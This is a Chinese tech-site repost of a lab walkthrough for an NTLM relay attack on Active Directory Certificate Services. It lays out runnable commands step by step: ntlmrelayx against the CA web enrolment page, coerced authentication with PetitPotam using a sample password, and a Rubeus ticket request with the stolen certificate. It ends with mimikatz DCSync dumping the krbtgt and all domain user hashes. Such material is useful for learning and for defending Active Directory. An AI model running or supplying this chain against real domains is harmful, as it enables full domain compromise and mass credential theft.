IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> AD CS证书服务中继攻击 -> 正文阅读

[网络协议]AD CS证书服务中继攻击

0x1 简介

AD CS支持几种基于HTTP协议的通过管理员可以安装的其他AD CS服务器角色功能,这些基于HTTP的证书注册接口都是易受攻击的NTLM中继攻击。
在这里插入图片描述

注:借图

0x2 环境信息

域控(windows server 2016):192.168.3.129
辅控(windows server 2016):192.168.3.131(AD CS)
域内主机(windows 10):192.168.3.171
攻击机(kali):192.168.3.158

搭建ADCS证书服务:https://mp.weixin.qq.com/s?__biz=MzI2NDQyNzg1OA==&mid=2247488431&idx=1&sn=6a9b1e785aec5f1d5a8d0ac86a667961&chksm=eaad9392ddda1a842088422e9a0f3a03c04073e52dc432995c917da7ca551ae6bfa114507181&scene=21#wechat_redirect

0x3 漏洞利用

1、查找ADCS证书服务器。
certutil -config - -ping
在这里插入图片描述

2、Authorization HTTP头明确允许通过NTLM进行身份验证。
curl dc2.yaoyao.com/certsrv/ -I
在这里插入图片描述在这里插入图片描述

3、攻击机器开启本地监听并将证书颁发机构(CA)设置为目标。
python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs
python3 ntlmrelayx.py -t http://192.168.3.131/certsrv/certfnsh.asp -smb2support --adcs
在这里插入图片描述

4、可以采用如下方式强制认证。
1)printerbug打印机漏洞

https://github.com/dirkjanm/krbrelayx
#格式:
python printerbug.py domain/username:password@<dc ip> <ntlmrelayx listen ip>

2)dementor.py脚本

https://github.com/NotMedic/NetNTLMtoSilverTicket
#格式:
python dementor.py -d domain -u username -p password <ntlmrelayx listen ip> <dc ip>

3)Petitpotam.py脚本

https://github.com/topotam/PetitPotam
#格式:
python Petitpotam.py -d domain -u username -p password <ntlmrelayx listen ip> <dc ip>

这里采用PetitPotam进行强制认证。(实测printerbug在winserver2016未成功。)
python3 PetitPotam.py -d yaoyao.com -u shanyi -p ‘Admin12345’ 192.168.3.158 192.168.3.129
在这里插入图片描述

5、ntlmrelayx成功获取证书。
在这里插入图片描述

6、利用上面获取到的证书,使用Rubeus获取TGT并注入。

#格式:
Rubeus.exe asktgt /user:<user> /certificate:<base64-certificate> /ptt
#示例:
Rubeus.exe asktgt /user:WIN-3IFUE0D5S8U$ /certificate:xxxxxxxxx /ptt

在这里插入图片描述

查看当前导入证书。
在这里插入图片描述

7、使用mimikatz即可导出域内任意用户哈希。

#查看kerberos票据
kerberos::list
#导出krbtgt用户的hash
lsadump::dcsync /user:krbtgt /csv
#导出所有用户的hash
mimikatz.exe "lsadump::dcsync /domain:yaoyao.com /all /csv" exit

在这里插入图片描述

0x4 参考

https://cloud.tencent.com/developer/article/1873728?from=article.detail.1937718
https://cloud.tencent.com/developer/article/1937718?from=article.detail.1896216

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-03-08 22:56:03  更:2022-03-08 22:58:25 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 7:44:24-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码